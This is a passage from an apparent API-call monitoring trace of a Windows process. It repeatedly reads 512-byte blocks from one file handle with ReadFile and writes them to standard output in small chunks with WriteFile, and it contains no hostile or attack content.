0x58 [0194.843] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.843] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.844] GetFileType (hFile=0x50) returned 0x1 [0194.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.844] GetFileType (hFile=0x50) returned 0x1 [0194.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.844] GetFileType (hFile=0x50) returned 0x1 [0194.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.844] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] GetFileType (hFile=0x50) returned 0x1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] GetFileType (hFile=0x50) returned 0x1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] GetFileType (hFile=0x50) returned 0x1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] GetFileType (hFile=0x50) returned 0x1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] GetFileType (hFile=0x50) returned 0x1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.845] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.845] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] GetFileType (hFile=0x50) returned 0x1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] GetFileType (hFile=0x50) returned 0x1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] GetFileType (hFile=0x50) returned 0x1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] GetFileType (hFile=0x50) returned 0x1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] GetFileType (hFile=0x50) returned 0x1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.847] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.847] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] GetFileType (hFile=0x50) returned 0x1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] GetFileType (hFile=0x50) returned 0x1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] GetFileType (hFile=0x50) returned 0x1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] GetFileType (hFile=0x50) returned 0x1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.848] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.848] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] GetFileType (hFile=0x50) returned 0x1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] GetFileType (hFile=0x50) returned 0x1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] GetFileType (hFile=0x50) returned 0x1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] GetFileType (hFile=0x50) returned 0x1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] GetFileType (hFile=0x50) returned 0x1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.850] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.850] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] GetFileType (hFile=0x50) returned 0x1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] GetFileType (hFile=0x50) returned 0x1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] GetFileType (hFile=0x50) returned 0x1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] GetFileType (hFile=0x50) returned 0x1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] GetFileType (hFile=0x50) returned 0x1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.851] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.851] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.853] GetFileType (hFile=0x50) returned 0x1 [0194.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.853] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.853] GetFileType (hFile=0x50) returned 0x1 [0194.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.853] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.853] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.853] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.977] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.979] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.979] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=1) returned 